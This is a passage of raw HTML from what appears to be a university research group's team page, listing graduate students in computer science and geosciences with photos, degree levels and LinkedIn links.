style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div 